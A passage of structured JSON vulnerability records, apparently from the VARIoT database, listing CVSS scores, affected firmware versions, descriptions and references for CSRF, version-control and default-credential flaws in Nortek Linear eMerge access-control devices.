"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_5000p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "4.6.07",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_5000p:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7270"
}
]
},
"cve": "CVE-2019-7270",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2019-7270",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-158705",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-7270",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-7270",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-093",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-158705",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2019-7270",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158705"
},
{
"db": "VULMON",
"id": "CVE-2019-7270"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006017"
},
{
"db": "NVD",
"id": "CVE-2019-7270"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-093"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear eMerge 50P/5000P devices allow Cross-Site Request Forgery (CSRF). Nortek Security \u0026 Control Linear eMerge 50P/5000P is a browser-based access control security control system developed by Nortek Security \u0026 Control Company in the United States. The vulnerability stems from the WEB application not adequately verifying that the request is from a trusted user. An attacker could exploit this vulnerability to send unexpected requests to the server through an affected client",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7270"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006017"
},
{
"db": "VULHUB",
"id": "VHN-158705"
},
{
"db": "VULMON",
"id": "CVE-2019-7270"
}
],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-7270",
"trust": 2.6
},
{
"db": "ICS CERT",
"id": "ICSA-20-184-01",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006017",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-093",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2020.2294",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "47252",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-158705",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2019-7270",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158705"
},
{
"db": "VULMON",
"id": "CVE-2019-7270"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006017"
},
{
"db": "NVD",
"id": "CVE-2019-7270"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-093"
}
]
},
"id": "VAR-201907-0171",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-158705"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:23:40.489000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.nortekcontrol.com/"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/live-hack-cve/cve-2019-7270 "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2019-7270"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006017"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158705"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006017"
},
{
"db": "NVD",
"id": "CVE-2019-7270"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://www.applied-risk.com/resources/ar-2019-006"
},
{
"trust": 1.8,
"url": "https://applied-risk.com/labs/advisories"
},
{
"trust": 1.8,
"url": "https://www.us-cert.gov/ics/advisories/icsa-20-184-01"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7270"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7270"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/47252"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.2294/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/352.html"
},
{
"trust": 0.1,
"url": "https://github.com/live-hack-cve/cve-2019-7270"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158705"
},
{
"db": "VULMON",
"id": "CVE-2019-7270"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006017"
},
{
"db": "NVD",
"id": "CVE-2019-7270"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-093"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-158705"
},
{
"db": "VULMON",
"id": "CVE-2019-7270"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-006017"
},
{
"db": "NVD",
"id": "CVE-2019-7270"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-093"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-07-02T00:00:00",
"db": "VULHUB",
"id": "VHN-158705"
},
{
"date": "2019-07-02T00:00:00",
"db": "VULMON",
"id": "CVE-2019-7270"
},
{
"date": "2019-07-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-006017"
},
{
"date": "2019-07-02T17:15:12.397000",
"db": "NVD",
"id": "CVE-2019-7270"
},
{
"date": "2019-07-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-093"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-07-02T00:00:00",
"db": "VULHUB",
"id": "VHN-158705"
},
{
"date": "2022-10-14T00:00:00",
"db": "VULMON",
"id": "CVE-2019-7270"
},
{
"date": "2019-07-08T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-006017"
},
{
"date": "2022-10-14T01:10:50.050000",
"db": "NVD",
"id": "CVE-2019-7270"
},
{
"date": "2020-07-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-093"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-093"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear eMerge 50P/5000P Device cross-site request forgery vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-006017"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-093"
}
],
"trust": 0.6
}
}
VAR-201907-0164
Vulnerability from variot - Updated: 2023-12-18 13:08Linear eMerge E3-Series devices have a Version Control Failure. Linear eMerge E3 Series devices contain source code vulnerabilities.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability stems from improper design or implementation problems in the code development process of network systems or products
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201907-0164",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linear emerge elite",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "1.00-06"
},
{
"model": "linear emerge essential",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "1.00-06"
},
{
"model": "linear emerge elite",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "linear emerge essential",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-005911"
},
{
"db": "NVD",
"id": "CVE-2019-7263"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_essential_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.00-06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_essential:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_elite_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.00-06",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:nortekcontrol:linear_emerge_elite:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7263"
}
]
},
"cve": "CVE-2019-7263",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2019-7263",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-158698",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-7263",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2019-7263",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-101",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-158698",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158698"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005911"
},
{
"db": "NVD",
"id": "CVE-2019-7263"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-101"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear eMerge E3-Series devices have a Version Control Failure. Linear eMerge E3 Series devices contain source code vulnerabilities.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability stems from improper design or implementation problems in the code development process of network systems or products",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-7263"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005911"
},
{
"db": "VULHUB",
"id": "VHN-158698"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-7263",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005911",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-101",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-158698",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158698"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005911"
},
{
"db": "NVD",
"id": "CVE-2019-7263"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-101"
}
]
},
"id": "VAR-201907-0164",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-158698"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T13:08:02.875000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "eMerge E3-Series Access Control",
"trust": 0.8,
"url": "https://www.nortekcontrol.com/pdf/literature/emerge-e3-series-brochure.pdf"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-005911"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-18",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158698"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005911"
},
{
"db": "NVD",
"id": "CVE-2019-7263"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.applied-risk.com/resources/ar-2019-005"
},
{
"trust": 1.7,
"url": "https://applied-risk.com/labs/advisories"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7263"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7263"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158698"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005911"
},
{
"db": "NVD",
"id": "CVE-2019-7263"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-101"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-158698"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005911"
},
{
"db": "NVD",
"id": "CVE-2019-7263"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-101"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-07-02T00:00:00",
"db": "VULHUB",
"id": "VHN-158698"
},
{
"date": "2019-07-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-005911"
},
{
"date": "2019-07-02T17:15:11.947000",
"db": "NVD",
"id": "CVE-2019-7263"
},
{
"date": "2019-07-02T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-101"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-07-03T00:00:00",
"db": "VULHUB",
"id": "VHN-158698"
},
{
"date": "2019-07-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-005911"
},
{
"date": "2019-07-03T18:45:30.263000",
"db": "NVD",
"id": "CVE-2019-7263"
},
{
"date": "2019-07-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-101"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-101"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linear eMerge E3 Series device vulnerabilities related to source code",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-005911"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-101"
}
],
"trust": 0.6
}
}
VAR-201907-0172
Vulnerability from variot - Updated: 2023-12-18 12:28Nortek Linear eMerge 50P/5000P devices have Default Credentials. Nortek Linear eMerge 50P/5000P The device contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Nortek Security & Control Linear eMerge 50P/5000P is a browser-based access control security control system developed by Nortek Security & Control Company in the United States. A trust management issue vulnerability exists in Nortek Security & Control Linear eMerge 50P/5000P. This vulnerability stems from the lack of an effective trust management mechanism in network systems or products. Attackers can use default passwords or hard-coded passwords, hard-coded certificates, etc. to attack affected components
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201907-0172",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linear emerge 50p",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "4.6.07"
},
{
"model": "linear emerge 5000p",
"scope": "lte",
"trust": 1.0,
"vendor": "nortekcontrol",
"version": "4.6.07"
},
{
"model": "linear emerge 5000p",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
},
{
"model": "linear emerge 50p",
"scope": null,
"trust": 0.8,
"vendor": "nortek",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-006003"
},
{
"db": "NVD",
"id": "CVE-2019-7271"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:nortekcontrol:linear_emerge_50p_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "4.6.07",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
